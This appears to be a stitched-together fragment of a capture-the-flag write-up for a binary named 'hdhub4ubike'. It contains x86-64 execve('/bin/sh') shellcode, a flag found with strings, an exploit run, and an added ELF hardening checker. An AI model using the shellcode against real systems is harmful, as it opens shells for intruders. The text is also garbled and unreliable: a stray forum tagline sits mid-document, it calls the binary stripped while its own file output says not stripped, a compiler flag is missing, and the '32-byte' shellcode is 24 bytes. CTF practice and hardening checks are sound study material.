```python
# 32‑byte execve("/bin/sh") shellcode (x86‑64)
shellcode = (
    b"\x48\x31\xd2"                               # xor rdx, rdx
    b"\x48\x31\xf6"                               # xor rsi, rsi
    b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00"   # movabs rdi, "/bin/sh"
    b"\x57"                                       # push rdi
    b"\x48\x89\xe7"                               # mov rdi, rsp
    b"\xb0\x3b"                                   # mov al, 0x3b
    b"\x0f\x05"                                   # syscall
)
```
```shell
$ strings -a hdhub4ubike | grep -i flag
flagh0p3_y0u_f0und_th3_h1d3_b1k3
```
```shell
$ ./exploit.py
=== Welcome to the HD Bike Hub ===
Enter your hub key: flagh0p3_y0u_f0und_th3_h1d3_b1k3
```
A space where enthusiasts share personal experiences and technical advice.
Static analysis quickly reveals that the binary is stripped (no symbols) and that it is compiled with , `-z execstack`, and `-no-pie` – classic "easy pwn" settings.
```shell
$ file hdhub4ubike
hdhub4ubike: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped, for GNU/Linux 3.2.0, BuildID[sha1]=...
```
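The two settings the static analysis above calls out, an executable stack (`-z execstack`) and a fixed-address, non-PIE executable (`-no-pie`), are both readable straight from the ELF headers: the PT_GNU_STACK program header's PF_X bit and the e_type field. The checker below is an added example, not code from the writeup; it parses those two fields by hand and, for a self-test, builds a constructed minimal (non-loadable) ELF64 image rather than reading the challenge binary.

```python
import struct
import sys

# Constants from the ELF64 specification.
PT_GNU_STACK = 0x6474E551   # program header that carries the stack's permission bits
PF_X = 0x1                  # executable flag inside p_flags
ET_EXEC, ET_DYN = 2, 3      # fixed-address executable vs position-independent

def elf_hardening(data: bytes) -> dict:
    """Report whether an ELF64 image has an NX stack and is PIE (a checksec subset)."""
    if data[:4] != b"\x7fELF" or data[4] != 2:      # EI_CLASS must be ELFCLASS64
        raise ValueError("not a 64-bit ELF")
    e = "<" if data[5] == 1 else ">"                # EI_DATA selects endianness
    e_type = struct.unpack_from(e + "H", data, 16)[0]
    e_phoff = struct.unpack_from(e + "Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 54)
    exec_stack = None   # stays None if no PT_GNU_STACK header exists (kernel default applies)
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from(e + "II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            exec_stack = bool(p_flags & PF_X)       # PF_X set => -z execstack
    return {
        "pie": e_type == ET_DYN,                    # ET_EXEC => built with -no-pie
        "nx_stack": exec_stack is False,
        "gnu_stack_missing": exec_stack is None,
    }

def make_sample_elf(e_type: int, stack_flags: int) -> bytes:
    """Constructed test input: 64-byte ELF header plus one PT_GNU_STACK program header."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, little-endian, v1
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH",
                               e_type, 0x3E, 1, 0, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr

if __name__ == "__main__":
    # Usage: python3 elfcheck.py <binary>; without an argument, check the constructed sample.
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else make_sample_elf(ET_EXEC, 7)
    print(elf_hardening(blob))
```

Run against a real binary it reports the same facts the writeup derives from `file` and `checksec`-style tooling; `gnu_stack_missing` is the case to watch on older toolchains, where the loader falls back to a platform default.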